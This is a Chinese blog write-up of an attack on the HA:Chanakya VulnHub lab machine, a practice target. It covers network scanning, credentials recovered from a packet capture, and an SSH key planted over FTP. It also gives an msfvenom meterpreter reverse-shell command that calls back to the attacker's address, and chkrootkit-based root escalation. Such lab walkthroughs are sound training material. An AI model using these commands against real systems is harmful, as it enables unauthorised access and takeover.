HA:chanakya靶机渗透

HA:chanakya靶机渗透

1.环境和信息

  1. 靶机下载地址

https://download.vulnhub.com/ha/chanakya.zip

  1. 环境

l  攻击机:kali linux IP地址:192.168.197.135

l  靶机环境:Linux ip:未知

2.信息收集

扫描靶机ip,靶机ip:192.168.197.139

nmap -sn -n -sP 192.168.197.0/24

 

 

扫描靶机服务

nmap -n -sS -sV 192.168.197.139

 

浏览器访问靶机网站,并没有发现什么特别的

 

使用dirb扫描靶机网站

dirb http://192.168.197.139 -X .txt,.php,.html,.xml

 

访问http://192.168.197.139/abuse.txt,应该是某种加密的东西

 

问了一下大佬发现是ROT13加密

解密下来是一个数据包文件格式的文件名

解密网站地址:https://rot13.com/

 

访问这个文件,下载下来

 

使用wireshark分析这个数据包文件,得到账号和密码ashoka/kautilya

 

利用ftp上传.ssh,使用kali免密登录

ssh-keygen

 

cd /root/.ssh

cat id_rsa.pub > authorized_keys

mv authorized_keys /root/

 

创建.ssh文件夹(我已经创建过了)

mkdir .ssh

cd .ssh

put authorized_keys

 

 

 

3.  提权

反弹meterpreter会话

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.197.135 LPORT=7999 -f elf  > shell.elf

 

 

 

 

利用meterpreter寻找可利用模块,结果却失败了

 

 

在/tmp目录下有个logs文件,这个是chkrootkit的扫描结果,这个就是我们突破口了

查看软件版本

 

查找漏洞,发现这个版本确实有漏洞,尝试利用msf里的模块

 

 

利用命令注入反弹shell

 

 

 

 

然后利用chkrootkit漏洞获取root权限,这个chkrootkit漏洞原理就是会定期使用root用户来执行/tmp/update文件,而这个模块在进行攻击时会在/tmp/下生成update文件,从而获取root权限

 

 

 

 

 

参考链接:https://www.cnblogs.com/bingtang123/p/13111695.html

https://www.it610.com/article/1294265150152450048.htm

https://blog.csdn.net/qq_44911239/article/details/119890515

 

posted @ 2021-12-06 11:33  MayaSoy  阅读(103)  评论(2)    收藏  举报